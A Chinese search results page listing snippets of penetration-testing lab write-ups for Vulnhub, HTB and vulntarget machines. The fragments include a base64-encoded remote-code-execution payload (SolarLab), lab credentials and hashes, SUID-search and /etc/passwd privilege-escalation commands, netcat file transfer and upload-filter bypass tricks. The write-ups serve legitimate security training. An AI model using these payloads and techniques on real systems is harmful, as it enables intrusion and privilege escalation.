首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏网络安全自修室

    每周打靶 | Vulnhub-DC7靶机渗透实战

    sC 192.168.241.140 -p 80,22 -oN 140n.xml 访问页面,发现有留下提示 这边提示,说要跳出框框,暴力破解和字典破解是不太行的 发现在欢迎页面的左下角有一个“@DC7USER ”,应该是接入点,然后百度搜索@DC7USER,发现一些网站代码 点击config.php发现用户名密码dc7user \ MdR3xOgB7#dW 综上信息搜集可以发现,该目标系统为Linux,开放 22和80端口,其中web服务是用的Drupal框架,用账号密码在ssh服务和网页后台进行登录,尝试打开突破口 0x03 获取权限 使用ssh尝试远程登录 ssh dc7user@192.168.241.140 查看dc7user用户有哪些文件,在mbox文件里面发现一个可以利用的脚本,同时该内容15分钟定时会发过来 进入到/opt/scripts查看backups.sh文件 且该脚本是以root权限运行

    55820编辑于 2023-09-02
  • 来自专栏YX’blog

    打靶练习】Certify

    games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7: 7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var ⼀般打靶场这种后续都可以利⽤到。 Multiprocessor Free 注册的所有人: 注册的组织: Aliyun 产品 ID: 00376-40000-00000-AA947 初始安装日期: 2023/7/ [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2500 Mhz BIOS 版本: SeaBIOS 449e491, 2014

    26310编辑于 2025-04-09
  • 来自专栏YX’blog

    打靶练习】Delegation

    然后rubeus就收到了来自dc的TGTpython dfscoerce.py -u WIN19 -hashes :a91969d7ad569d8591027fa9d707b3ad -d xiaorang.lab

    10210编辑于 2025-07-13
  • 来自专栏瞳瞳too的学习笔记

    打靶实战 ---NOOB爆破

    7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 dc:e8:ad:80:35:81:c4:29:7e

    38810编辑于 2023-10-26
  • 来自专栏红队蓝军

    htb打靶记录-SolarLab

    LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNDU3ODUzNjcwMTMzNTUyOTgzMDExNzk0MzIxNzYKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJ0aW1lX2ludGVydmFsIgoKMjAyOS0wNS0yNiB0byAyMDI5LTA1LTI3Ci0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMTQ1Nzg1MzY3MDEzMzU1Mjk4MzAxMTc5NDMyMTc2CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0ibGVhdmVfcmVxdWVzdCIKCntjbWR9Ci0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMTQ1Nzg1MzY3MDEzMzU1Mjk4MzAxMTc5NDMyMTc2CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0ic2lnbmF0dXJlIjsgZmlsZW5hbWU9IlVudGl0bGVkLnBuZyIKQ29udGVudC1UeXBlOiBpbWFnZS9wbmcKColQTkcKGgoAAAAKSUhEUgAAAAoAAAAKCAIAAAACUFjqAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAApSURBVChTY9i +fbuAgAADAwMHB8f8+fMlJCSAbARA5gNVQFkjGzAwAADL7QTzijujCwAAAABJRU5ErkJgggotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTE0NTc4NTM2NzAxMzM1NTI5ODMwMTE3OTQzMjE3NgpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9InVzZXJfaW5wdXQiCgo8cD5hc2RmPC9wPgotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTE0NTc4NTM2NzAxMzM1NTI5ODMwMTE3OTQzMjE3Ni0t b64decode("PHA+PGZvbnQgY29sb3I9IlsgWyBnZXRhdHRyKHBvdywgV29yZCgnX19nbG9iYWxzX18nKSlbJ29zJ10uc3lzdGVtKCd7Y21kfScpIGZvciBXb3JkIGluIFsgb3JnVHlwZUZ1biggJ1dvcmQnLCAoc3RyLCksIHsgJ211dGF0ZWQnOiAxLCAnc3RhcnRzd2l0aCc6IGxhbWJkYSBzZWxmLCB4OiBGYWxzZSwgJ19fZXFfXyc6IGxhbWJkYSBzZWxmLCB4OiBzZWxmLm11dGF0ZSgpIGFuZCBzZWxmLm11dGF0ZWQgPCAwIGFuZCBzdHIoc2VsZikgPT0geCwgJ211dGF0ZSc6IGxhbWJkYSBzZWxmOiB7c2V0YXR0cihzZWxmLCAnbXV0YXRlZCcsIHNlbGYubXV0YXRlZCAtIDEpfSwgJ19faGFzaF9fJzogbGFtYmRhIHNlbGY6IGhhc2goc3RyKHNlbGYpKSwgfSwgKSBdIF0gZm9yIG9yZ1R5cGVGdW4gaW4gW3R5cGUodHlwZSgxKSldXSBhbmQgJ3JlZCciPgoxPC9mb250PjwvcD4

    36910编辑于 2024-07-15
  • 来自专栏YX’blog

    打靶练习】medium_socnet

    https://www.vulnhub.com/entry/boredhackerblog-social-network,454/

    39730编辑于 2023-09-10
  • 来自专栏红蓝对抗

    vulntarget-i 打靶记录

    漏洞靶场系列(九)— vulntarget-I github地址: https://github.com/crow821/vulntarget No1 1.1 信息收集 靶机80端口访问过去后显示IIS7环境界面没有任何敏感信息

    63530编辑于 2022-12-23
  • 来自专栏乌鸦安全

    vulntarget-b_打靶记录

    二)— vulntarget-b 关于vulntarget漏洞靶场: https://github.com/crow821/vulntarget 02打 靶 流 程 3.1 WEB渗透-Centos7

    1.8K30编辑于 2022-01-04
  • 来自专栏XRSec.Blog

    Vulnhub EvilBox靶机打靶过程

    192.168.0.104 Linux Kernel 192.168.0.103 涉及技术 主机发现 网络扫描 强制访问 参数爆破 文件包含 PHP封装器 任意文件读取 SSH公钥登录 离线密码破解 系统权限漏洞利用 打靶开始 passwd可以进行文件写入 使用,openssl 生成一段密文 openssl passwd -1 然后替换/etc/passwd里面的x 20210925234956721039.png 提权成功,打靶结束

    73710编辑于 2022-03-12
  • 来自专栏乌鸦安全

    vulntarget-h 打靶记录

    0x01 环境 vulntarget-h拓扑 windows10:mimataichangjibuzhu windows7:mimataichangyebuhao win2008: Winmimayijingwangjile 相关漏洞技术 sql注入、文件包含、命令执行,免杀等漏洞利用、隧道代理等 本地环境配置 win2008 > ip : 192.168.153.130 192.168.1.102 win7 > ip :192.168.153.128 win10 > ip : 192.168.153.129 0x02 打靶记录 Win2008 打开这个站点看一下 note: use querystring * Password : Winmimayijingwangjile@ * Username : Administrator * Domain : WIN-7DSM1JVE9PO * Password : Adminmimayijingwangjile@ 3389之后先直接果断地干掉360,先关闭主动防御: windows7 双网卡 接收:nc -lvvp 1234 < 1.txt 发送:nc

    91220编辑于 2022-08-11
  • 来自专栏乌鸦安全

    vulntarget-f打靶记录

    乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。

    1.2K20编辑于 2022-06-07
  • 来自专栏乌鸦安全

    vulntarget-i 打靶记录

    漏洞靶场系列(九)— vulntarget-I github地址: https://github.com/crow821/vulntarget No1 1.1 信息收集 靶机80端口访问过去后显示IIS7环境界面没有任何敏感信息

    91810编辑于 2022-12-19
  • 来自专栏乌鸦安全

    【永久开源】vulntarget-a 打靶记录

    Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) | OS CPE: cpe:/o:microsoft:windows_7: :sp1:professional | Computer name: win7-PC | NetBIOS computer name: WIN7-PC\x00 | Workgroup: WORKGROUP win7-PC f0d412bd764ffe81aad3b435b51404ee 209c6174da490caeb422f3fa5a7ae634 7c87541fd3f3ef5016e12d411900c87a6046a8e8 PC$ WORKGROUP (null) win7 win7-PC admin tspkg credentials ================= Username Domain Password -------- ------ -------- win7 win7-PC admin kerberos credentials ==============

    4.5K30编辑于 2022-03-11
  • 来自专栏安全小圈

    打靶系列之- DC-4

    既然看到了登录密码框,而且提示,账户名为:admin,只需要就用BurpSuite将密码爆破出来

    92430发布于 2021-05-28
  • 来自专栏安全小圈

    打靶系列之DC-6

    /bash")' 05 提权 在服务器一通查询,发现在 /home/mark/stuff 目录下有个things-to-do.txt文件 查看一下发现居然有服务器账号和密码 graham - GSo7isUM1D4

    69550发布于 2021-09-18
  • 来自专栏打靶记录

    vulnhub打靶记录:TBBT2

    --> 这句话的意思是-提示我未来的自己,以防我忘记我的密码/fyhd7fhf84ihdiksowj -> 看到了这个/,第一反应是目录,如果不是的话,后面保留作为密码,或者是需要解密的密码 得到提示是正确的道路 erp[2] = 1159751796;erp[3] = 1835810317;erp[4] = 171731060;erp[5] = 1835810317;erp[6] = 168626748;erp[7] * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )47 6 * * 7 2020 ..177562 -rwxr-x--- 1 root root 225 Απρ 7 2020 .antihacker.py177369 -rwsr-xr-x 1 root root 8,2K Απρ 7 2020 iliketrains177433 -rw-r--r-- 1 root root 71 Απρ 7 2020 .iliketrains.c

    37400编辑于 2024-12-17
  • 来自专栏安全小圈

    打靶系列之-DC-5

    在页面中多浏览一下,发现Contact模块下可以输入内容,于是尝试多输入几次之后,发现了有意思的地方

    1.1K40发布于 2021-08-26
  • 来自专栏网络安全自修室

    打靶归来详解uploadlabs靶场(上)

    一句话木马getshell会在Pass02[4]演示一遍,之后将不再演示1. webshell最好设置不同名,或者在每次上传成功后删除,避免出现绕过失败但测试成功的情况 Pass14~Pass21的题解见:打靶归来 但前提是apache的http.conf文件做了如此[7]配置 第一步:上传后缀名为.phtml(根据配置尝试)的webshell 第二步:确认webshell是否上传成功 dtbl1 ctxtv 【Pass04 在保存文件时,会自动去除末尾的. jzx8u 【Pass09 - 利用::$DATA绕过】 题目: i0jbw 绕过方法 缺少去除字符串::DATA,利用在后缀名之后添加字符串::DATA绕过 h0d7q /upload/shell.php 第一步:修改webshell的后缀为白名单内的后缀并上传 第二步:抓包,然后修改URL值 第三步:访问%00前填入的文件名,判断是否上传成功 1g9bj od7w8 0x00结束即可实现绕过 第一步:修改webshell的后缀为白名单内的后缀并上传 第二步:抓包,然后修改POST中的路径值 第二步的详细步骤: 修改完成后发包 eyz8z gwvo1 l3uej wj7yd

    1.4K10编辑于 2024-02-29
  • 来自专栏安全小圈

    打靶系列之 - dc-1

    前言 这篇文章是零度安全2021年的首篇文章,后期将会陆续更新打靶,实战系列的文章。 在这里也感谢大家对零度安全的支持与信任。 ? 这个时候我们获取了123456 加密后的密码 进入数据库执行 update users set pass='SDlSKHHi7ce.SDNqIi.ADRfU4jht/eXAyXmj8pINH0oqLO4IW9vOM'where 7. 越权 输入命令,目的是为了使用find命令查看拥有suid权限的文件 find / -perm -u=s -type f 2>/dev/null ? ?

    1.2K20发布于 2021-03-15
  • 来自专栏乌鸦安全

    【永久开源】vulntarget-c 打靶记录

    下载地址 百度云链接: https://pan.baidu.com/s/1p3GDd7V3Unmq3-wSAvl7_Q 提取码:1p9p 其中vulntarget-c是本次环境 github地址: https 打靶过程 3.1 第一层 nmap端口扫描 看到80端口开放的Laravel 寻找了多个EXP之后,终于找到一个能用的:将脚本文件和phpggc这个脚本放在同一级目录下 phpgcc:https:/

    1.7K20编辑于 2022-03-11
领券